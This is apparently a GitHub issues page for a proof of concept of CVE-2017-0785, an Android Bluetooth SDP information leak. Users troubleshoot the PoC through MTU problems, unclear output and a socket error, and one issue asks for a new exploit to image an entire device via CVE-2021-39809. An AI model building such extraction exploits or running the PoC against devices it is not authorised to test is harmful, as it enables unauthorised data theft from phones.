
cve-2017-0785's People

Contributors

ojasookert

cve-2017-0785's Issues

Server does not change MTU

I'm testing the PoC with Kali on a Nexus 5 and a Samsung S7.
The execution hangs on the sock.recv() because the first SDP response from the device is larger than the set MTU and the Bluetooth module drops the packet.
Here you can find the Wireshark capture of the Bluetooth traffic.
mtu.zip

Samsung S7: Android version 6.0.1, security patch November 2016, kernel version 3.18.14-9519568
Nexus 5: Android 5.0.1, build LRX22C

CVE-2021-39809

Can you make an exploit script or app for the CVE? It is an out-of-bounds read one and should have options to acquire the full filesystem or image the entire device. This is useful for backup of the filesystem before bootloader unlock. This will also be useful for law enforcement to solve murder mysteries and for an average dude to back up his device.

How to get libc.so and bluetooth.default.so

I used your PoC and got the information, but I do not understand the stack overflow, and I do not know Android. Can you help me? I saw this article: https://paper.seebug.org/430.
The return value is as follows:

root@kali:~/bluet/CVE-2017-0785# python CVE-2017-0785.py TARGET=4C:49:E3:5D:8A:BF
[+] Exploit: Done

Exploit succeeded or failed?

It is not clear to me whether the exploit failed or succeeded. I do notice that on some devices the stack always seems to have a couple of characters at the end that are similar, but other than that, I don't know.

EDIT

After some puzzling, I worked out that the strings at the end say something like:
thread id 81 95,
thread name bt_workqueue started

Address family not supported by protocol

 Exploit: Creating L2CAP socket
Traceback (most recent call last):
  File "CVE-2017-0785.py", line 26, in <module>
    sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
  File "/usr/local/lib/python2.7/dist-packages/bluetooth/bluez.py", line 155, in __init__
    _sock = _bt.btsocket (proto)
_bluetooth.error: (97, 'Address family not supported by protocol')
